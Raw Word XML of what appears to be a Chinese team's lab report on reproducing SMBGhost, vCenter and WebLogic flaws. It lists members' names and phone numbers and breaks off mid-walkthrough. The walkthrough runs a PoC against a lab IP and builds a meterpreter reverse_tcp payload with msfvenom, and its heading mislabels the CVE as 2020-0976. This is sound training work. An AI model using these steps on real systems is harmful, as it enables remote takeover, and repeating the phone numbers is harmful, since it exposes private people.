        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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职务</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11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姓名</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="45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联系方式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80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cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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组长</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11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eastAsia="宋体" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"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val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>王峥</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="45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eastAsia="宋体" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"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val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>15122706061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80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cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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组员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11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eastAsia="宋体" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"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val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>李佳璐</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="45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13935200496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80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cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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组员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="11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eastAsia="宋体" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"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val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>陈恩宝</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="45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15590387223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80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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="17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组员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="113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eastAsia="宋体" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"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val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
              </w:rPr>
              <w:t>王承铃</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="45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18350903189</w:t>
            </w:r>
            <w:bookmarkStart w:id="48" w:name="_GoBack"/>
            <w:bookmarkEnd w:id="48"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:r>
        <w:t>2.2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞对象</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
      <w:bookmarkEnd w:id="12"/>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>Window 10 version 1903/1909</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>VMware vCenter Server 7.0/6.7/6.5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t></w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Wingdings" w:hAnsi="Wingdings" w:cs="Wingdings"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Weblogic Server </w:t>
      </w:r>
      <w:r>
        <w:t>10.3.6.0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 12.1.3.0</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="14"/>
    <w:bookmarkEnd w:id="15"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc33"/>
      <w:bookmarkStart w:id="17" w:name="_Toc5023"/>
      <w:bookmarkStart w:id="18" w:name="_Toc27662"/>
      <w:r>
        <w:t>2.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞复现阶段</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17"/>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="15"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="1852" w:tblpY="341"/>
        <w:tblOverlap w:val="never"/>
        <w:tblW w:w="8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3"/>
        <w:gridCol w:w="43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</w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4343" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="400" w:lineRule="atLeast"/>
              <w:ind w:firstLine="480" w:firstLineChars="200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项目阶段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4376" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="400" w:lineRule="atLeast"/>
              <w:ind w:firstLine="480" w:firstLineChars="200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工作内容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343" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="400" w:lineRule="atLeast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查找漏洞基本信息并学习漏洞实现原理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4376" w:type="dxa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查阅漏洞公告、CVE 报告或安全研究文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章，以获取有关漏洞的详细信息。了解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漏洞的描述、影响范围、受影响的版本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和可能的利用方式。仔细研究相关软件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或系统的源代码和官方文档，了解漏洞 </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left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属于哪种类型。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4343" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:ind w:firstLine="720" w:firstLineChars="300"/>
              <w:jc w:val="left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查找存在该漏洞的网站</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4376" w:type="dxa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使用指纹匹配技术来进行识别和筛选，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通过分析目标网站的特征信息，例如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HTTP 响应头、HTML 源代码和特定的错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误页面，来确定网站所使用的软件、版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本和配置。还可以通过查阅漏洞数据库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（如 CVE、NVD）和公开报告以及安全研 </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left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究 社 区 和 论 坛 （ 如 Github 、 Stack 、Overflow、安全编程等），搜索相关的 漏洞信息。或使用Exploit-DB 和漏洞利用框架以及安全扫描工具进一步发现。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4343" w:type="dxa"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="400" w:lineRule="atLeast"/>
              <w:ind w:firstLine="720" w:firstLineChars="300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搭建漏洞复现的环境</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4376" w:type="dxa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根据漏洞公告指定的版本，搭建特定版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本的环境。例如使用 Docker 搭建目标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系统的特定版本，或搭建虚拟靶机。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安装和配置必要的组件和工具，确保环 </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left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境能够复现漏洞。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4343" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:ind w:firstLine="960" w:firstLineChars="400"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漏洞测试和复现</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="400" w:lineRule="atLeast"/>
              <w:ind w:firstLine="480" w:firstLineChars="200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</w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4376" w:type="dxa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使用攻击机针对目标系统进行漏洞测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试和利用尝试。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根据漏洞详情和已知的利用方式，按步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骤复现漏洞，记录每个步骤的操作和结 </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left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4343" w:type="dxa"/>
            <w:vAlign w:val="center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尝试分析漏洞利用成功或失败的原因</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="400" w:lineRule="atLeast"/>
              <w:ind w:firstLine="480" w:firstLineChars="200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</w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4376" w:type="dxa"/>
          </w:tcPr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如果漏洞利用成功，详细记录成功利用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 xml:space="preserve">漏洞的步骤和结果。 </w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
            </w:pPr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如果漏洞利用失败，分析可能的原因并</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:spacing w:line="400" w:lineRule="atLeast"/>
              <w:textAlignment w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>尝试修正。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc29668"/>
      <w:bookmarkStart w:id="20" w:name="_Toc1270"/>
      <w:bookmarkStart w:id="21" w:name="_Toc18669"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2.4风险等级</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
      <w:bookmarkEnd w:id="20"/>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="15"/>
        <w:tblW w:w="877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3"/>
        <w:gridCol w:w="1651"/>
        <w:gridCol w:w="57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3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编号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1651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风险等级</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5721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风险描述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3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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1651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高风险</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5721" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>该漏洞由SMB 3.1.1协议中处理压缩消息时，对其中数据没有经过安全检查，没有检查长度是否合法，最终导致整数溢出，直接使用会引发内存破坏漏洞，可能被攻击者利用远程执行任意代码，攻击者利用该漏洞无须权限即可实现远程代码执行，受黑客攻击的目标系统只需开机在线即可能被入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3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</w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1651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高风险</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5721" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
                <w:color w:val="000000"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>vSphere Client（HTML5） 在 vCenter Server 插件中存在一个远程执行代码漏洞。未授权的攻击者可以通过开放 443端口的服务器向 vCenter Server 发送精心构造的请求，写入 webshell，控制服务器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3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</w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1651" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p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高风险</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5721" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>在Oracle官方发布的2020年4月关键补丁公告中，包含针对WebLogic Server的严重漏洞，允许未经身份验证的攻击者通过T3协议网络访问并破坏易受攻击的Weblogic Server，成功的漏洞利用可导致WebLogic Server被攻击者接管，从而导致远程代码被执行。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="312" w:after="312"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc28758"/>
      <w:bookmarkStart w:id="23" w:name="_Toc6854"/>
      <w:bookmarkStart w:id="24" w:name="_Toc1379"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.漏洞复现过程</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5分）</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc19034"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.1 风险管理及规避</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/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1.使用虚拟化或容器化技术：在测试过程中，使用虚拟化或容器化技术，如 VMware、VirtualBox、Docker 等，来创建隔离的测试环境。这样可以确保测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试不会影响真实生产系统，并且在出现问题时可以快速还原环境。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2.备份客户系统：在进行漏洞复现之前，务必对客户系统进行全面备份，包括系统配置、数据和应用程序。这样可以在测试出现问题时，通过还原备份来恢复系统到测试之前的状态，避免潜在风险。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3.使用快照：在进行关键的测试阶段创建快照。快照是系统状态的镜像，可以在测试过程中进行试验后随时回滚到该状态，以防止测试影响到正常运行。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4.限制网络访问：在测试环境中限制容器或虚拟机的网络访问权限，避免漏洞利用或测试代码对外部网络产生影响。最好在测试环境中禁用网络访问，只与必要的资源进行内部通信。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 xml:space="preserve">5.隔离测试环境：将测试环境与生产环境隔离，确保测试环境不受到外部干扰，并防止测试对生产环境产生影响。可使用物理隔离或网络隔离手段，确保测试活动受到保护。 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="ar"/>
        </w:rPr>
        <w:t>6.监控和日志记录：在测试过程中，定期监控测试环境的运行状态，并记录测试活动的日志。这样可以及时发现异常情况，并追踪测试过程中的活动。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="156" w:after="156"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc10352"/>
      <w:bookmarkStart w:id="27" w:name="_Toc23034"/>
      <w:bookmarkStart w:id="28" w:name="_Toc29103"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>测试方法</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
      <w:bookmarkEnd w:id="27"/>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="29" w:name="_Toc32313"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.2.1 CVE-2020-0976</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2.1.1 详细过程</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>搭建环境：根据漏洞公告，我们将使用window10的1903版本进行靶机的搭建</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4171950" cy="2495550"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="11" name="图片 11" descr="屏幕截图 2024-07-19 12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07-19 1255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并且为能进行攻击，我们将关闭防火墙.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关闭防火墙：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>设置--&gt;更新和安全--&gt;Windows安全中心--&gt;防火墙和网络保护</w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273040" cy="3909695"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12" name="图片 12" descr="屏幕截图 2024-07-19 12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07-19 125807"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:srcRect b="187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55770"/>
            <wp:effectExtent l="0" t="0" r="635" b="11430"/>
            <wp:docPr id="15" name="图片 15" descr="屏幕截图 2024-07-19 13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07-19 1303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然后我们再通过靶机与操作机互ping检查</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="2326640"/>
            <wp:effectExtent l="0" t="0" r="1905" b="10160"/>
            <wp:docPr id="13" name="图片 13" descr="屏幕截图 2024-07-19 12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7-19 1259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77975"/>
            <wp:effectExtent l="0" t="0" r="1270" b="9525"/>
            <wp:docPr id="14" name="图片 14" descr="屏幕截图 2024-07-19 12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7-19 1259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由此可以继续进行操作</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们利用github中下载的工具进行蓝屏测试</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载完成后放入kali虚拟机中，执行以下命令：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>unzip CVE-2020-0796-PoC-master.zip</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>cd CVE-2020-0796-PoC-master</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t> ./CVE-2020-0796.py 靶机IP地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 可以通过nmap进行扫描，找出我们的靶机ip</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="1990090"/>
            <wp:effectExtent l="0" t="0" r="1270" b="3810"/>
            <wp:docPr id="17" name="图片 17" descr="屏幕截图 2024-07-19 13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07-19 1311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885950"/>
            <wp:effectExtent l="0" t="0" r="3175" b="6350"/>
            <wp:docPr id="18" name="图片 18" descr="屏幕截图 2024-07-19 13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7-19 1312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我们发现靶机是192.168.188.139，进行漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="528955"/>
            <wp:effectExtent l="0" t="0" r="1905" b="4445"/>
            <wp:docPr id="19" name="图片 19" descr="屏幕截图 2024-07-19 13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07-19 13080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07565"/>
            <wp:effectExtent l="0" t="0" r="7620" b="635"/>
            <wp:docPr id="16" name="图片 16" descr="屏幕截图 2024-07-19 13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07-19 1309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证明漏洞存在</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞攻击</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">从github进行基础工具的下载，将基础工具解压后，进入目录 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>接下来使用msf生成exp的反弹shell，及payload文件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msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=kali的IP地址 LPORT=5555 -b '\x00' -i 1 -f python &gt; exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>-f后面是类型，-o后面名字，-b 后面是设定规避字符集，比如: '\x00\xff'避免使用的字符。lhost参数跟的是kali自己的ip，因为是我们是在kali这里生成的程序文件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="2218055"/>
            <wp:effectExtent l="0" t="0" r="10795" b="4445"/>
            <wp:docPr id="20" name="图片 20" descr="屏幕截图 2024-07-19 13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7-19 1323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接下来将生成的exploit文件中的buf替换为USER_PAYLOAD,命令如下：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vi exploit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:%s/buf/USER_PAYLOAD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:wq</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这段指令是为了：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>首先将</w:t>
      </w:r>
      <w:r>
        <w:t>exploit的文件打开并加载到vi编辑器中。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>:%s/buf/USER_PAYLOAD这条命令是vi中的替换命令，具体解释如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>:：进入vi的命令模式。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>%：表示替换应该应用于文件的每一行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>s：代表替换操作。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>buf：搜索模式，vi将在每一行中寻找这个模式。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>USER_PAYLOAD：替换文本，将替换每个buf的实例。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>因此，这条命令会在整个文件中将所有的buf替换为USER_PAYLOAD。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>:wq：这条命令保存所做的更改（如果有的话）并退出vi编辑器。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>w：写入（保存）文件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>q：退出编辑器。</w:t>
      </w:r>
